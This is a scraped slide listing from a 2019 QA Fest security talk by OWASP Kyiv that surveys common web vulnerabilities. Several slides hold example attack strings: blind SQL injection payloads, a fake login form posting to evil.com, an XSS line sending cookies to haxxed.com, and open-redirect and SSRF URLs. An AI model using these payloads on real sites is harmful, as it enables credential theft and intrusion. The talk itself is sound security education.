SQL Server Security - Attack
Die SlideShare-Präsentation wird heruntergeladen.
×
![FILE INCLUSION
<?php
$file = $_GET[«file»];
include(“/var/www/backend/$file”);
?>
https://example.com/?page=contact.php](https://image.slidesharecdn.com/qafest-191004081627/75/qa-fest-2019-40-12-2048.jpg?cb=1668674897)
Hier ansehen
Empfohlen
Weitere Verwandte Inhalte
Ähnlich wie QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин (20)
Weitere von QAFest (20)
Aktuellste (20)
QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин
- 1. KYIV 2019 Короленко Сергій Всі вразливості у веб додатках
- 2. Bugcrowd’s Vulnerability Rating Taxonomy
- 3. RCE Remote Code Execution | Code injection
- 4. RCE Remote Code Execution | Code injection
- 5. SQL Injection
- 6. SQL Injection
- 7. SQL Injection
- 8. SQL Injection
- 9. SQL Injection
- 10. Stacked queries UNION query-based Error-based Boolean-based blind Time-based blind 1 AND (ascii(substr((SELECT version()),1,1))) > 52— 1 AND IF((SELECT ascii(substr(version(),1,1))) > 53,sleep(10),NULL)— 1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(version(),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)-- 1 UNION ALL SELECT NULL,version()-- 1; SELECT version()-- SQL Injection
- 11. XXE |XML external entity injection
- 12. FILE INCLUSION <?php $file = $_GET[«file»]; include(“/var/www/backend/$file”); ?> https://example.com/?page=contact.php
- 13. DIRECTORY TRAVERSAL
- 14. UNSAFE FILE UPLOAD
- 15. UNSAFE FILE UPLOAD
- 16. CRLF injection (CRLF, rn, %0A%0D)
- 17. HTML Injection Hi! My name is <h1>hacker</h1> Hello HACKER Hi! My name is <h1>Log in to view a content</h1> <form action="http://evil.com"> Username: <input name="username"><br> Password: <input name="password"><br> <input type="submit"> </form>
- 18. XSS | Cross Site Scripting
- 19. XSS Stored/Reflected
- 20. XSS | Cross Site Scripting www.welp.com?search=<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>
- 21. Open Redirection https://bank.com/redirect.php?go=http://attacker.com/phish/
- 22. http://bank.com/transfer?amount=50.0&from=4165**02&to=7893-1892-2940-4280 http://bank.com/transfer?amount=50.0&from=4165**02&to=4153-1802-9420-4483 CSRF | Cross-Site Request Forgery
- 23. CSRF | Cross-Site Request Forgery
- 24. SSRF| Server Side Request Forgery http://example.com/?url=http://localhost/server-status
- 25. Default Credentials/Configuration
- 26. Authentication Bypass
- 27. Weak Password Policy
- 28. Weak password reset question/answer
- 29. Weak password change/reset http://bank.com/reset_password?email=ololo@example.com&token=1561324612 http://bank.com/reset_password?email=ololo@example.com&token=1561324754 http://bank.com/reset_password?email=ololo@example.com&token=1561324698 MD5 ("ololo@example.com") = 83fa8dbfe2725ff513c4028a7f60df36 http://bank.com/reset_password?email=ololo@example.com&token= 83fa8dbfe2725ff513c4028a7f60df36 http://bank.com/reset_password?email=ololo@example.com&token= 83fa8dbfe2725ff513c4028a7f60df36
- 30. Bypass 2FA
- 31. Privilege Escalation
- 32. Broken Access Control http://bank.com/admin/reset_password?user=ololo@example.com&newpass=3.1415pec!
- 33. COOKIES Attributes
- 34. Session Fixation
- 35. Password API Keys /.git/ Sensitive Data Exposure
- 36. Directory Listing DirSearch (backups, logs, etc.)
- 37. Unencrypted Communication
- 38. Privileged user: uid=0(root) No Rate Limits CAPTCHA Bypass
- 39. Security Headers •Server headers that protect against attacks ◦HTTP Strict Transport Security ◦Content Security Policy ◦Access-Control-Allow-Origin ◦X-FrameOptions ◦X-XSS-Protection ◦X-Content-Type-Options •Server headers that leak information ◦Server ◦X-Powered-By ◦X-AspNet-Version
- 40. Detailed Error
- 41. https://www.youtube.com/OWASPKyiv https://www.facebook.com/owaspkyiv https://owasp.slack.com/messages/chapter-ua/
